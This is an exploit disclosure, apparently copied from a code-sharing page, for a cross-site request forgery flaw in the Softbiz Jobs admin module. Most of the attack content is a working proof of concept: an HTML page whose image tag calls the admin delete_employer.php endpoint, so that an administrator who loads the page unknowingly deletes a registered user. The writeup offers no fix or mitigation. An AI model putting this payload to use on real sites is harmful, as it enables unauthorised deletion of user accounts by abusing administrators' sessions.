49 lines
No EOL
1.3 KiB
Text
49 lines
No EOL
1.3 KiB
Text
=======================================================================
|
|
|
|
Softbiz Jobs CSRF Vulnerability
|
|
=======================================================================
|
|
|
|
by
|
|
|
|
Pratul Agrawal
|
|
|
|
|
|
# Vulnerability found in- Admin module
|
|
|
|
# email Pratulag@yahoo.com
|
|
|
|
# company aksitservices
|
|
|
|
# Credit by Pratul Agrawal
|
|
|
|
# Download http://www.softbizscripts.com/
|
|
|
|
# Script softbizscripts
|
|
|
|
|
|
|
|
# Proof of concept
|
|
|
|
Script to delete the registered user through Cross Site request forgery
|
|
|
|
...................................................................................................................
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
|
|
...................................................................................................................
|
|
|
|
|
|
|
|
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
|
|
|
|
|
|
#If you have any questions, comments, or concerns, feel free to contact me. |